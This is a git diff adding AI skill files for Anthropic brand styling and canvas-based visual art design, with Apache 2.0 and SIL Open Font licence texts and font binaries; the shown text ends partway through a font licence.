skills/brand-guidelines/SKILL.md
Normal file
@@ -0,0 +1,73 @@
|
|||||||
|
---
|
||||||
|
name: brand-guidelines
|
||||||
|
description: Applies Anthropic's official brand colors and typography to any sort of artifact that may benefit from having Anthropic's look-and-feel. Use it when brand colors or style guidelines, visual formatting, or company design standards apply.
|
||||||
|
license: Complete terms in LICENSE.txt
|
||||||
|
---
|
||||||
|
|
||||||
|
# Anthropic Brand Styling
|
||||||
|
|
||||||
|
## Overview
|
||||||
|
|
||||||
|
To access Anthropic's official brand identity and style resources, use this skill.
|
||||||
|
|
||||||
|
**Keywords**: branding, corporate identity, visual identity, post-processing, styling, brand colors, typography, Anthropic brand, visual formatting, visual design
|
||||||
|
|
||||||
|
## Brand Guidelines
|
||||||
|
|
||||||
|
### Colors
|
||||||
|
|
||||||
|
**Main Colors:**
|
||||||
|
|
||||||
|
- Dark: `#141413` - Primary text and dark backgrounds
|
||||||
|
- Light: `#faf9f5` - Light backgrounds and text on dark
|
||||||
|
- Mid Gray: `#b0aea5` - Secondary elements
|
||||||
|
- Light Gray: `#e8e6dc` - Subtle backgrounds
|
||||||
|
|
||||||
|
**Accent Colors:**
|
||||||
|
|
||||||
|
- Orange: `#d97757` - Primary accent
|
||||||
|
- Blue: `#6a9bcc` - Secondary accent
|
||||||
|
- Green: `#788c5d` - Tertiary accent
|
||||||
|
|
||||||
|
### Typography
|
||||||
|
|
||||||
|
- **Headings**: Poppins (with Arial fallback)
|
||||||
|
- **Body Text**: Lora (with Georgia fallback)
|
||||||
|
- **Note**: Fonts should be pre-installed in your environment for best results
|
||||||
|
|
||||||
|
## Features
|
||||||
|
|
||||||
|
### Smart Font Application
|
||||||
|
|
||||||
|
- Applies Poppins font to headings (24pt and larger)
|
||||||
|
- Applies Lora font to body text
|
||||||
|
- Automatically falls back to Arial/Georgia if custom fonts unavailable
|
||||||
|
- Preserves readability across all systems
|
||||||
|
|
||||||
|
### Text Styling
|
||||||
|
|
||||||
|
- Headings (24pt+): Poppins font
|
||||||
|
- Body text: Lora font
|
||||||
|
- Smart color selection based on background
|
||||||
|
- Preserves text hierarchy and formatting
|
||||||
|
|
||||||
|
### Shape and Accent Colors
|
||||||
|
|
||||||
|
- Non-text shapes use accent colors
|
||||||
|
- Cycles through orange, blue, and green accents
|
||||||
|
- Maintains visual interest while staying on-brand
|
||||||
|
|
||||||
|
## Technical Details
|
||||||
|
|
||||||
|
### Font Management
|
||||||
|
|
||||||
|
- Uses system-installed Poppins and Lora fonts when available
|
||||||
|
- Provides automatic fallback to Arial (headings) and Georgia (body)
|
||||||
|
- No font installation required - works with existing system fonts
|
||||||
|
- For best results, pre-install Poppins and Lora fonts in your environment
|
||||||
|
|
||||||
|
### Color Application
|
||||||
|
|
||||||
|
- Uses RGB color values for precise brand matching
|
||||||
|
- Applied via python-pptx's RGBColor class
|
||||||
|
- Maintains color fidelity across different systems
|
||||||
202
skills/canvas-design/LICENSE.txt
Normal file
202
skills/canvas-design/LICENSE.txt
Normal file
@@ -0,0 +1,202 @@
|
|||||||
|
|
||||||
|
Apache License
|
||||||
|
Version 2.0, January 2004
|
||||||
|
http://www.apache.org/licenses/
|
||||||
|
|
||||||
|
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
||||||
|
|
||||||
|
1. Definitions.
|
||||||
|
|
||||||
|
"License" shall mean the terms and conditions for use, reproduction,
|
||||||
|
and distribution as defined by Sections 1 through 9 of this document.
|
||||||
|
|
||||||
|
"Licensor" shall mean the copyright owner or entity authorized by
|
||||||
|
the copyright owner that is granting the License.
|
||||||
|
|
||||||
|
"Legal Entity" shall mean the union of the acting entity and all
|
||||||
|
other entities that control, are controlled by, or are under common
|
||||||
|
control with that entity. For the purposes of this definition,
|
||||||
|
"control" means (i) the power, direct or indirect, to cause the
|
||||||
|
direction or management of such entity, whether by contract or
|
||||||
|
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
||||||
|
outstanding shares, or (iii) beneficial ownership of such entity.
|
||||||
|
|
||||||
|
"You" (or "Your") shall mean an individual or Legal Entity
|
||||||
|
exercising permissions granted by this License.
|
||||||
|
|
||||||
|
"Source" form shall mean the preferred form for making modifications,
|
||||||
|
including but not limited to software source code, documentation
|
||||||
|
source, and configuration files.
|
||||||
|
|
||||||
|
"Object" form shall mean any form resulting from mechanical
|
||||||
|
transformation or translation of a Source form, including but
|
||||||
|
not limited to compiled object code, generated documentation,
|
||||||
|
and conversions to other media types.
|
||||||
|
|
||||||
|
"Work" shall mean the work of authorship, whether in Source or
|
||||||
|
Object form, made available under the License, as indicated by a
|
||||||
|
copyright notice that is included in or attached to the work
|
||||||
|
(an example is provided in the Appendix below).
|
||||||
|
|
||||||
|
"Derivative Works" shall mean any work, whether in Source or Object
|
||||||
|
form, that is based on (or derived from) the Work and for which the
|
||||||
|
editorial revisions, annotations, elaborations, or other modifications
|
||||||
|
represent, as a whole, an original work of authorship. For the purposes
|
||||||
|
of this License, Derivative Works shall not include works that remain
|
||||||
|
separable from, or merely link (or bind by name) to the interfaces of,
|
||||||
|
the Work and Derivative Works thereof.
|
||||||
|
|
||||||
|
"Contribution" shall mean any work of authorship, including
|
||||||
|
the original version of the Work and any modifications or additions
|
||||||
|
to that Work or Derivative Works thereof, that is intentionally
|
||||||
|
submitted to Licensor for inclusion in the Work by the copyright owner
|
||||||
|
or by an individual or Legal Entity authorized to submit on behalf of
|
||||||
|
the copyright owner. For the purposes of this definition, "submitted"
|
||||||
|
means any form of electronic, verbal, or written communication sent
|
||||||
|
to the Licensor or its representatives, including but not limited to
|
||||||
|
communication on electronic mailing lists, source code control systems,
|
||||||
|
and issue tracking systems that are managed by, or on behalf of, the
|
||||||
|
Licensor for the purpose of discussing and improving the Work, but
|
||||||
|
excluding communication that is conspicuously marked or otherwise
|
||||||
|
designated in writing by the copyright owner as "Not a Contribution."
|
||||||
|
|
||||||
|
"Contributor" shall mean Licensor and any individual or Legal Entity
|
||||||
|
on behalf of whom a Contribution has been received by Licensor and
|
||||||
|
subsequently incorporated within the Work.
|
||||||
|
|
||||||
|
2. Grant of Copyright License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
copyright license to reproduce, prepare Derivative Works of,
|
||||||
|
publicly display, publicly perform, sublicense, and distribute the
|
||||||
|
Work and such Derivative Works in Source or Object form.
|
||||||
|
|
||||||
|
3. Grant of Patent License. Subject to the terms and conditions of
|
||||||
|
this License, each Contributor hereby grants to You a perpetual,
|
||||||
|
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
||||||
|
(except as stated in this section) patent license to make, have made,
|
||||||
|
use, offer to sell, sell, import, and otherwise transfer the Work,
|
||||||
|
where such license applies only to those patent claims licensable
|
||||||
|
by such Contributor that are necessarily infringed by their
|
||||||
|
Contribution(s) alone or by combination of their Contribution(s)
|
||||||
|
with the Work to which such Contribution(s) was submitted. If You
|
||||||
|
institute patent litigation against any entity (including a
|
||||||
|
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
||||||
|
or a Contribution incorporated within the Work constitutes direct
|
||||||
|
or contributory patent infringement, then any patent licenses
|
||||||
|
granted to You under this License for that Work shall terminate
|
||||||
|
as of the date such litigation is filed.
|
||||||
|
|
||||||
|
4. Redistribution. You may reproduce and distribute copies of the
|
||||||
|
Work or Derivative Works thereof in any medium, with or without
|
||||||
|
modifications, and in Source or Object form, provided that You
|
||||||
|
meet the following conditions:
|
||||||
|
|
||||||
|
(a) You must give any other recipients of the Work or
|
||||||
|
Derivative Works a copy of this License; and
|
||||||
|
|
||||||
|
(b) You must cause any modified files to carry prominent notices
|
||||||
|
stating that You changed the files; and
|
||||||
|
|
||||||
|
(c) You must retain, in the Source form of any Derivative Works
|
||||||
|
that You distribute, all copyright, patent, trademark, and
|
||||||
|
attribution notices from the Source form of the Work,
|
||||||
|
excluding those notices that do not pertain to any part of
|
||||||
|
the Derivative Works; and
|
||||||
|
|
||||||
|
(d) If the Work includes a "NOTICE" text file as part of its
|
||||||
|
distribution, then any Derivative Works that You distribute must
|
||||||
|
include a readable copy of the attribution notices contained
|
||||||
|
within such NOTICE file, excluding those notices that do not
|
||||||
|
pertain to any part of the Derivative Works, in at least one
|
||||||
|
of the following places: within a NOTICE text file distributed
|
||||||
|
as part of the Derivative Works; within the Source form or
|
||||||
|
documentation, if provided along with the Derivative Works; or,
|
||||||
|
within a display generated by the Derivative Works, if and
|
||||||
|
wherever such third-party notices normally appear. The contents
|
||||||
|
of the NOTICE file are for informational purposes only and
|
||||||
|
do not modify the License. You may add Your own attribution
|
||||||
|
notices within Derivative Works that You distribute, alongside
|
||||||
|
or as an addendum to the NOTICE text from the Work, provided
|
||||||
|
that such additional attribution notices cannot be construed
|
||||||
|
as modifying the License.
|
||||||
|
|
||||||
|
You may add Your own copyright statement to Your modifications and
|
||||||
|
may provide additional or different license terms and conditions
|
||||||
|
for use, reproduction, or distribution of Your modifications, or
|
||||||
|
for any such Derivative Works as a whole, provided Your use,
|
||||||
|
reproduction, and distribution of the Work otherwise complies with
|
||||||
|
the conditions stated in this License.
|
||||||
|
|
||||||
|
5. Submission of Contributions. Unless You explicitly state otherwise,
|
||||||
|
any Contribution intentionally submitted for inclusion in the Work
|
||||||
|
by You to the Licensor shall be under the terms and conditions of
|
||||||
|
this License, without any additional terms or conditions.
|
||||||
|
Notwithstanding the above, nothing herein shall supersede or modify
|
||||||
|
the terms of any separate license agreement you may have executed
|
||||||
|
with Licensor regarding such Contributions.
|
||||||
|
|
||||||
|
6. Trademarks. This License does not grant permission to use the trade
|
||||||
|
names, trademarks, service marks, or product names of the Licensor,
|
||||||
|
except as required for reasonable and customary use in describing the
|
||||||
|
origin of the Work and reproducing the content of the NOTICE file.
|
||||||
|
|
||||||
|
7. Disclaimer of Warranty. Unless required by applicable law or
|
||||||
|
agreed to in writing, Licensor provides the Work (and each
|
||||||
|
Contributor provides its Contributions) on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
||||||
|
implied, including, without limitation, any warranties or conditions
|
||||||
|
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
||||||
|
PARTICULAR PURPOSE. You are solely responsible for determining the
|
||||||
|
appropriateness of using or redistributing the Work and assume any
|
||||||
|
risks associated with Your exercise of permissions under this License.
|
||||||
|
|
||||||
|
8. Limitation of Liability. In no event and under no legal theory,
|
||||||
|
whether in tort (including negligence), contract, or otherwise,
|
||||||
|
unless required by applicable law (such as deliberate and grossly
|
||||||
|
negligent acts) or agreed to in writing, shall any Contributor be
|
||||||
|
liable to You for damages, including any direct, indirect, special,
|
||||||
|
incidental, or consequential damages of any character arising as a
|
||||||
|
result of this License or out of the use or inability to use the
|
||||||
|
Work (including but not limited to damages for loss of goodwill,
|
||||||
|
work stoppage, computer failure or malfunction, or any and all
|
||||||
|
other commercial damages or losses), even if such Contributor
|
||||||
|
has been advised of the possibility of such damages.
|
||||||
|
|
||||||
|
9. Accepting Warranty or Additional Liability. While redistributing
|
||||||
|
the Work or Derivative Works thereof, You may choose to offer,
|
||||||
|
and charge a fee for, acceptance of support, warranty, indemnity,
|
||||||
|
or other liability obligations and/or rights consistent with this
|
||||||
|
License. However, in accepting such obligations, You may act only
|
||||||
|
on Your own behalf and on Your sole responsibility, not on behalf
|
||||||
|
of any other Contributor, and only if You agree to indemnify,
|
||||||
|
defend, and hold each Contributor harmless for any liability
|
||||||
|
incurred by, or claims asserted against, such Contributor by reason
|
||||||
|
of your accepting any such warranty or additional liability.
|
||||||
|
|
||||||
|
END OF TERMS AND CONDITIONS
|
||||||
|
|
||||||
|
APPENDIX: How to apply the Apache License to your work.
|
||||||
|
|
||||||
|
To apply the Apache License to your work, attach the following
|
||||||
|
boilerplate notice, with the fields enclosed by brackets "[]"
|
||||||
|
replaced with your own identifying information. (Don't include
|
||||||
|
the brackets!) The text should be enclosed in the appropriate
|
||||||
|
comment syntax for the file format. We also recommend that a
|
||||||
|
file or class name and description of purpose be included on the
|
||||||
|
same "printed page" as the copyright notice for easier
|
||||||
|
identification within third-party archives.
|
||||||
|
|
||||||
|
Copyright [yyyy] [name of copyright owner]
|
||||||
|
|
||||||
|
Licensed under the Apache License, Version 2.0 (the "License");
|
||||||
|
you may not use this file except in compliance with the License.
|
||||||
|
You may obtain a copy of the License at
|
||||||
|
|
||||||
|
http://www.apache.org/licenses/LICENSE-2.0
|
||||||
|
|
||||||
|
Unless required by applicable law or agreed to in writing, software
|
||||||
|
distributed under the License is distributed on an "AS IS" BASIS,
|
||||||
|
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
||||||
|
See the License for the specific language governing permissions and
|
||||||
|
limitations under the License.
|
||||||
130
skills/canvas-design/SKILL.md
Normal file
130
skills/canvas-design/SKILL.md
Normal file
@@ -0,0 +1,130 @@
|
|||||||
|
---
|
||||||
|
name: canvas-design
|
||||||
|
description: Create beautiful visual art in .png and .pdf documents using design philosophy. You should use this skill when the user asks to create a poster, piece of art, design, or other static piece. Create original visual designs, never copying existing artists' work to avoid copyright violations.
|
||||||
|
license: Complete terms in LICENSE.txt
|
||||||
|
---
|
||||||
|
|
||||||
|
These are instructions for creating design philosophies - aesthetic movements that are then EXPRESSED VISUALLY. Output only .md files, .pdf files, and .png files.
|
||||||
|
|
||||||
|
Complete this in two steps:
|
||||||
|
1. Design Philosophy Creation (.md file)
|
||||||
|
2. Express by creating it on a canvas (.pdf file or .png file)
|
||||||
|
|
||||||
|
First, undertake this task:
|
||||||
|
|
||||||
|
## DESIGN PHILOSOPHY CREATION
|
||||||
|
|
||||||
|
To begin, create a VISUAL PHILOSOPHY (not layouts or templates) that will be interpreted through:
|
||||||
|
- Form, space, color, composition
|
||||||
|
- Images, graphics, shapes, patterns
|
||||||
|
- Minimal text as visual accent
|
||||||
|
|
||||||
|
### THE CRITICAL UNDERSTANDING
|
||||||
|
- What is received: Some subtle input or instructions by the user that should be taken into account, but used as a foundation; it should not constrain creative freedom.
|
||||||
|
- What is created: A design philosophy/aesthetic movement.
|
||||||
|
- What happens next: Then, the same version receives the philosophy and EXPRESSES IT VISUALLY - creating artifacts that are 90% visual design, 10% essential text.
|
||||||
|
|
||||||
|
Consider this approach:
|
||||||
|
- Write a manifesto for an art movement
|
||||||
|
- The next phase involves making the artwork
|
||||||
|
|
||||||
|
The philosophy must emphasize: Visual expression. Spatial communication. Artistic interpretation. Minimal words.
|
||||||
|
|
||||||
|
### HOW TO GENERATE A VISUAL PHILOSOPHY
|
||||||
|
|
||||||
|
**Name the movement** (1-2 words): "Brutalist Joy" / "Chromatic Silence" / "Metabolist Dreams"
|
||||||
|
|
||||||
|
**Articulate the philosophy** (4-6 paragraphs - concise but complete):
|
||||||
|
|
||||||
|
To capture the VISUAL essence, express how the philosophy manifests through:
|
||||||
|
- Space and form
|
||||||
|
- Color and material
|
||||||
|
- Scale and rhythm
|
||||||
|
- Composition and balance
|
||||||
|
- Visual hierarchy
|
||||||
|
|
||||||
|
**CRITICAL GUIDELINES:**
|
||||||
|
- **Avoid redundancy**: Each design aspect should be mentioned once. Avoid repeating points about color theory, spatial relationships, or typographic principles unless adding new depth.
|
||||||
|
- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final work should appear as though it took countless hours to create, was labored over with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted," "the product of deep expertise," "painstaking attention," "master-level execution."
|
||||||
|
- **Leave creative space**: Remain specific about the aesthetic direction, but concise enough that the next Claude has room to make interpretive choices also at a extremely high level of craftmanship.
|
||||||
|
|
||||||
|
The philosophy must guide the next version to express ideas VISUALLY, not through text. Information lives in design, not paragraphs.
|
||||||
|
|
||||||
|
### PHILOSOPHY EXAMPLES
|
||||||
|
|
||||||
|
**"Concrete Poetry"**
|
||||||
|
Philosophy: Communication through monumental form and bold geometry.
|
||||||
|
Visual expression: Massive color blocks, sculptural typography (huge single words, tiny labels), Brutalist spatial divisions, Polish poster energy meets Le Corbusier. Ideas expressed through visual weight and spatial tension, not explanation. Text as rare, powerful gesture - never paragraphs, only essential words integrated into the visual architecture. Every element placed with the precision of a master craftsman.
|
||||||
|
|
||||||
|
**"Chromatic Language"**
|
||||||
|
Philosophy: Color as the primary information system.
|
||||||
|
Visual expression: Geometric precision where color zones create meaning. Typography minimal - small sans-serif labels letting chromatic fields communicate. Think Josef Albers' interaction meets data visualization. Information encoded spatially and chromatically. Words only to anchor what color already shows. The result of painstaking chromatic calibration.
|
||||||
|
|
||||||
|
**"Analog Meditation"**
|
||||||
|
Philosophy: Quiet visual contemplation through texture and breathing room.
|
||||||
|
Visual expression: Paper grain, ink bleeds, vast negative space. Photography and illustration dominate. Typography whispered (small, restrained, serving the visual). Japanese photobook aesthetic. Images breathe across pages. Text appears sparingly - short phrases, never explanatory blocks. Each composition balanced with the care of a meditation practice.
|
||||||
|
|
||||||
|
**"Organic Systems"**
|
||||||
|
Philosophy: Natural clustering and modular growth patterns.
|
||||||
|
Visual expression: Rounded forms, organic arrangements, color from nature through architecture. Information shown through visual diagrams, spatial relationships, iconography. Text only for key labels floating in space. The composition tells the story through expert spatial orchestration.
|
||||||
|
|
||||||
|
**"Geometric Silence"**
|
||||||
|
Philosophy: Pure order and restraint.
|
||||||
|
Visual expression: Grid-based precision, bold photography or stark graphics, dramatic negative space. Typography precise but minimal - small essential text, large quiet zones. Swiss formalism meets Brutalist material honesty. Structure communicates, not words. Every alignment the work of countless refinements.
|
||||||
|
|
||||||
|
*These are condensed examples. The actual design philosophy should be 4-6 substantial paragraphs.*
|
||||||
|
|
||||||
|
### ESSENTIAL PRINCIPLES
|
||||||
|
- **VISUAL PHILOSOPHY**: Create an aesthetic worldview to be expressed through design
|
||||||
|
- **MINIMAL TEXT**: Always emphasize that text is sparse, essential-only, integrated as visual element - never lengthy
|
||||||
|
- **SPATIAL EXPRESSION**: Ideas communicate through space, form, color, composition - not paragraphs
|
||||||
|
- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy visually - provide creative room
|
||||||
|
- **PURE DESIGN**: This is about making ART OBJECTS, not documents with decoration
|
||||||
|
- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final work must look meticulously crafted, labored over with care, the product of countless hours by someone at the top of their field
|
||||||
|
|
||||||
|
**The design philosophy should be 4-6 paragraphs long.** Fill it with poetic design philosophy that brings together the core vision. Avoid repeating the same points. Keep the design philosophy generic without mentioning the intention of the art, as if it can be used wherever. Output the design philosophy as a .md file.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## DEDUCING THE SUBTLE REFERENCE
|
||||||
|
|
||||||
|
**CRITICAL STEP**: Before creating the canvas, identify the subtle conceptual thread from the original request.
|
||||||
|
|
||||||
|
**THE ESSENTIAL PRINCIPLE**:
|
||||||
|
The topic is a **subtle, niche reference embedded within the art itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful abstract composition. The design philosophy provides the aesthetic language. The deduced topic provides the soul - the quiet conceptual DNA woven invisibly into form, color, and composition.
|
||||||
|
|
||||||
|
This is **VERY IMPORTANT**: The reference must be refined so it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song - only those who know will catch it, but everyone appreciates the music.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## CANVAS CREATION
|
||||||
|
|
||||||
|
With both the philosophy and the conceptual framework established, express it on a canvas. Take a moment to gather thoughts and clear the mind. Use the design philosophy created and the instructions below to craft a masterpiece, embodying all aspects of the philosophy with expert craftsmanship.
|
||||||
|
|
||||||
|
**IMPORTANT**: For any type of content, even if the user requests something for a movie/game/book, the approach should still be sophisticated. Never lose sight of the idea that this should be art, not something that's cartoony or amateur.
|
||||||
|
|
||||||
|
To create museum or magazine quality work, use the design philosophy as the foundation. Create one single page, highly visual, design-forward PDF or PNG output (unless asked for more pages). Generally use repeating patterns and perfect shapes. Treat the abstract philosophical design as if it were a scientific bible, borrowing the visual language of systematic observation—dense accumulation of marks, repeated elements, or layered patterns that build meaning through patient repetition and reward sustained viewing. Add sparse, clinical typography and systematic reference markers that suggest this could be a diagram from an imaginary discipline, treating the invisible subject with the same reverence typically reserved for documenting observable phenomena. Anchor the piece with simple phrase(s) or details positioned subtly, using a limited color palette that feels intentional and cohesive. Embrace the paradox of using analytical visual language to express ideas about human experience: the result should feel like an artifact that proves something ephemeral can be studied, mapped, and understood through careful attention. This is true art.
|
||||||
|
|
||||||
|
**Text as a contextual element**: Text is always minimal and visual-first, but let context guide whether that means whisper-quiet labels or bold typographic gestures. A punk venue poster might have larger, more aggressive type than a minimalist ceramics studio identity. Most of the time, font should be thin. All use of fonts must be design-forward and prioritize visual communication. Regardless of text scale, nothing falls off the page and nothing overlaps. Every element must be contained within the canvas boundaries with proper margins. Check carefully that all text, graphics, and visual elements have breathing room and clear separation. This is non-negotiable for professional execution. **IMPORTANT: Use different fonts if writing text. Search the `./canvas-fonts` directory. Regardless of approach, sophistication is non-negotiable.**
|
||||||
|
|
||||||
|
Download and use whatever fonts are needed to make this a reality. Get creative by making the typography actually part of the art itself -- if the art is abstract, bring the font onto the canvas, not typeset digitally.
|
||||||
|
|
||||||
|
To push boundaries, follow design instinct/intuition while using the philosophy as a guiding principle. Embrace ultimate design freedom and choice. Push aesthetics and design to the frontier.
|
||||||
|
|
||||||
|
**CRITICAL**: To achieve human-crafted quality (not AI-generated), create work that looks like it took countless hours. Make it appear as though someone at the absolute top of their field labored over every detail with painstaking care. Ensure the composition, spacing, color choices, typography - everything screams expert-level craftsmanship. Double-check that nothing overlaps, formatting is flawless, every detail perfect. Create something that could be shown to people to prove expertise and rank as undeniably impressive.
|
||||||
|
|
||||||
|
Output the final result as a single, downloadable .pdf or .png file, alongside the design philosophy used as a .md file.
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
## FINAL STEP
|
||||||
|
|
||||||
|
**IMPORTANT**: The user ALREADY said "It isn't perfect enough. It must be pristine, a masterpiece if craftsmanship, as if it were about to be displayed in a museum."
|
||||||
|
|
||||||
|
**CRITICAL**: To refine the work, avoid adding more graphics; instead refine what has been created and make it extremely crisp, respecting the design philosophy and the principles of minimalism entirely. Rather than adding a fun filter or refactoring a font, consider how to make the existing composition more cohesive with the art. If the instinct is to call a new function or draw a new shape, STOP and instead ask: "How can I make what's already here more of a piece of art?"
|
||||||
|
|
||||||
|
Take a second pass. Go back to the code and refine/polish further to make this a philosophically designed masterpiece.
|
||||||
|
|
||||||
|
## MULTI-PAGE OPTION
|
||||||
|
|
||||||
|
To create additional pages when requested, create more creative pages along the same lines as the design philosophy but distinctly different as well. Bundle those pages in the same .pdf or many .pngs. Treat the first page as just a single page in a whole coffee table book waiting to be filled. Make the next pages unique twists and memories of the original. Have them almost tell a story in a very tasteful way. Exercise full creative freedom.
|
||||||
93
skills/canvas-design/canvas-fonts/ArsenalSC-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/ArsenalSC-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2012 The Arsenal Project Authors (andrij.design@gmail.com)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
"Font Software" refers to the set of files released by the Copyright
|
||||||
|
Holder(s) under this license and clearly marked as such. This may
|
||||||
|
include source files, build scripts and documentation.
|
||||||
|
|
||||||
|
"Reserved Font Name" refers to any names specified as such after the
|
||||||
|
copyright statement(s).
|
||||||
|
|
||||||
|
"Original Version" refers to the collection of Font Software components as
|
||||||
|
distributed by the Copyright Holder(s).
|
||||||
|
|
||||||
|
"Modified Version" refers to any derivative made by adding to, deleting,
|
||||||
|
or substituting -- in part or in whole -- any of the components of the
|
||||||
|
Original Version, by changing formats or by porting the Font Software to a
|
||||||
|
new environment.
|
||||||
|
|
||||||
|
"Author" refers to any designer, engineer, programmer, technical
|
||||||
|
writer or other person who contributed to the Font Software.
|
||||||
|
|
||||||
|
PERMISSION & CONDITIONS
|
||||||
|
Permission is hereby granted, free of charge, to any person obtaining
|
||||||
|
a copy of the Font Software, to use, study, copy, merge, embed, modify,
|
||||||
|
redistribute, and sell modified and unmodified copies of the Font
|
||||||
|
Software, subject to the following conditions:
|
||||||
|
|
||||||
|
1) Neither the Font Software nor any of its individual components,
|
||||||
|
in Original or Modified Versions, may be sold by itself.
|
||||||
|
|
||||||
|
2) Original or Modified Versions of the Font Software may be bundled,
|
||||||
|
redistributed and/or sold with any software, provided that each copy
|
||||||
|
contains the above copyright notice and this license. These can be
|
||||||
|
included either as stand-alone text files, human-readable headers or
|
||||||
|
in the appropriate machine-readable metadata fields within text or
|
||||||
|
binary files as long as those fields can be easily viewed by the user.
|
||||||
|
|
||||||
|
3) No Modified Version of the Font Software may use the Reserved Font
|
||||||
|
Name(s) unless explicit written permission is granted by the corresponding
|
||||||
|
Copyright Holder. This restriction only applies to the primary font name as
|
||||||
|
presented to the users.
|
||||||
|
|
||||||
|
4) The name(s) of the Copyright Holder(s) or the Author(s) of the Font
|
||||||
|
Software shall not be used to promote, endorse or advertise any
|
||||||
|
Modified Version, except to acknowledge the contribution(s) of the
|
||||||
|
Copyright Holder(s) and the Author(s) or with their explicit written
|
||||||
|
permission.
|
||||||
|
|
||||||
|
5) The Font Software, modified or unmodified, in part or in whole,
|
||||||
|
must be distributed entirely under this license, and must not be
|
||||||
|
distributed under any other license. The requirement for fonts to
|
||||||
|
remain under this license does not apply to any document created
|
||||||
|
using the Font Software.
|
||||||
|
|
||||||
|
TERMINATION
|
||||||
|
This license becomes null and void if any of the above conditions are
|
||||||
|
not met.
|
||||||
|
|
||||||
|
DISCLAIMER
|
||||||
|
THE FONT SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
|
||||||
|
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO ANY WARRANTIES OF
|
||||||
|
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT
|
||||||
|
OF COPYRIGHT, PATENT, TRADEMARK, OR OTHER RIGHT. IN NO EVENT SHALL THE
|
||||||
|
COPYRIGHT HOLDER BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
|
||||||
|
INCLUDING ANY GENERAL, SPECIAL, INDIRECT, INCIDENTAL, OR CONSEQUENTIAL
|
||||||
|
DAMAGES, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
|
||||||
|
FROM, OUT OF THE USE OR INABILITY TO USE THE FONT SOFTWARE OR FROM
|
||||||
|
OTHER DEALINGS IN THE FONT SOFTWARE.
|
||||||
BIN
skills/canvas-design/canvas-fonts/ArsenalSC-Regular.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/ArsenalSC-Regular.ttf
Normal file
Binary file not shown.
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Bold.ttf
Normal file
BIN
skills/canvas-design/canvas-fonts/BigShoulders-Bold.ttf
Normal file
Binary file not shown.
93
skills/canvas-design/canvas-fonts/BigShoulders-OFL.txt
Normal file
93
skills/canvas-design/canvas-fonts/BigShoulders-OFL.txt
Normal file
@@ -0,0 +1,93 @@
|
|||||||
|
Copyright 2019 The Big Shoulders Project Authors (https://github.com/xotypeco/big_shoulders)
|
||||||
|
|
||||||
|
This Font Software is licensed under the SIL Open Font License, Version 1.1.
|
||||||
|
This license is copied below, and is also available with a FAQ at:
|
||||||
|
https://openfontlicense.org
|
||||||
|
|
||||||
|
|
||||||
|
-----------------------------------------------------------
|
||||||
|
SIL OPEN FONT LICENSE Version 1.1 - 26 February 2007
|
||||||
|
-----------------------------------------------------------
|
||||||
|
|
||||||
|
PREAMBLE
|
||||||
|
The goals of the Open Font License (OFL) are to stimulate worldwide
|
||||||
|
development of collaborative font projects, to support the font creation
|
||||||
|
efforts of academic and linguistic communities, and to provide a free and
|
||||||
|
open framework in which fonts may be shared and improved in partnership
|
||||||
|
with others.
|
||||||
|
|
||||||
|
The OFL allows the licensed fonts to be used, studied, modified and
|
||||||
|
redistributed freely as long as they are not sold by themselves. The
|
||||||
|
fonts, including any derivative works, can be bundled, embedded,
|
||||||
|
redistributed and/or sold with any software provided that any reserved
|
||||||
|
names are not used by derivative works. The fonts and derivatives,
|
||||||
|
however, cannot be released under any other type of license. The
|
||||||
|
requirement for fonts to remain under this license does not apply
|
||||||
|
to any document created using the fonts or their derivatives.
|
||||||
|
|
||||||
|
DEFINITIONS
|
||||||
|
